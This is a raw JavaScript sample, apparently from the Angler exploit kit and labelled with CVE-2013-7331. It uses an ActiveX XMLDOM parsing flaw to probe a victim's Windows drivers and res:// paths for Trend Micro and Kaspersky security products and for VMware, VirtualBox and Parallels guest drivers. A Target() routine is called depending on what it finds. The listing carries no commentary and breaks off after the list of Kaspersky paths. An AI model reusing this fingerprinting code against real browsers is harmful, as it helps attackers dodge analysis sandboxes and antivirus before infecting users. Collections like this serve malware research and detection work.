AnglerEK_CVE-2013-7331_2014-10-02

1.   function gs7sfd(txt) {
2.       var xmlDoc = new ActiveXObject("Microsoft.XMLDOM"),
3.           subpath = "c:\\Windows\\System32\\drivers\\" + txt + ".sys";
4.       xmlDoc.async = true;
5.       xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://' + subpath + '">');
6.       if (xmlDoc.parseError.errorCode != 0) {
7.           var pe = xmlDoc.parseError,
8.               err = "Error Code: " + pe.errorCode + "\n";
9.           err += "Error Reason: " + pe.reason;
10.           err += "Error Line: " + pe.line;
11.           if (err.indexOf("-2147023083") > 0) {
12.               return 1;
13.           } else {
14.               return 0;
15.           }
16.       }
17.       return 0;
18.   }
19.   if (gs7sfd("kl1") || gs7sfd("tmactmon") || gs7sfd("tmcomm") || gs7sfd("tmevtmgr") || gs7sfd("TMEBC32") || gs7sfd("tmeext") || gs7sfd("tmnciesc") || gs7sfd("tmtdi") || gs7sfd("vm3dmp") || gs7sfd("vmusbmouse") || gs7sfd("vmmouse") || gs7sfd("vmhgfs") || gs7sfd("VBoxGuest") || gs7sfd("VBoxMouse") || gs7sfd("VBoxSF") || gs7sfd("VBoxVideo") || gs7sfd("prl_boot") || gs7sfd("prl_fs") || gs7sfd("prl_kmdd") || gs7sfd("prl_memdev") || gs7sfd("prl_mouf") || gs7sfd("prl_pv32") || gs7sfd("prl_sound") || gs7sfd("prl_strg") || gs7sfd("prl_tg") || gs7sfd("prl_time")) {
20.       Target();
21.   } else {
22.       function Check(s) {
23.           x = new Image();
24.           x.onload = Target;
25.           x.src = s;
26.           return 0;
27.       }
28.       var kv1 = "res://C:\\Program Files",
29.           kv2 = "\\Kaspersky Lab\\Kaspersky ",
30.           kv3 = "Anti-Virus ",
31.           kv4 = "Internet Security ",
32.           kv5 = "\\shellex.dll/#2/#102",
33.           kv6 = "\\mfc42.dll/#2/#26567",
34.           pathdata = [kv1 + kv2 + kv3 + '5.0 for Windows Workstations' + kv5, kv1 + kv2 + kv3 + '6.0 for Windows Workstations' + kv5, kv1 + kv2 + kv3 + '6.0' + kv5, kv1 + kv2 + kv3 + '7.0' + kv5, kv1 + kv2 + kv3 + '2009' + kv6, kv1 + kv2 + kv3 + '2010' + kv6, kv1 + kv2 + kv3 + '2011\\avzkrnl.dll/#2/BBALL', kv1 + kv2 + kv3 + '2012\\x86' + kv6, kv1 + kv2 + kv3 + '2013\\x86' + kv6, kv1 + kv2 + kv4 + '6.0' + kv5, kv1 + kv2 + kv4 + '7.0' + kv5, kv1 + kv2 + kv4 + '2009' + kv6, kv1 + kv2 + kv4 + '2010' + kv6, kv1 + kv2 + kv4 + '2011\\avzkrnl.dll/#2/BBALL', kv1 + kv2 + kv4 + '2012\\x86' + kv6, kv1 + kv2 + kv4 + '2013\\x86' + kv6, kv1 + kv2 + kv4 + '14.0.0\\x86' + kv6, kv1 + kv2 + kv4 + '15.0.0\\x86' + kv6, kv1 + kv2 + 'PURE' + kv6, kv1 + kv2 + 'PURE 2.0\\x86' + kv6, kv1 + kv2 + 'PURE 3.0\\x86' + kv6, kv1 + ' (x86)' + kv2 + kv3 + '2013\\x86' + kv6, kv1 + ' (x86)' + kv2 + kv4 + '2013\\x86' + kv6, kv1 + ' (x86)' + kv2 + 'PURE' + kv6, kv1 + ' (x86)' + kv2 + 'PURE 2.0\\x86' + kv6, kv1 + ' (x86)' + kv2 + 'PURE 3.0\\x86' + kv6];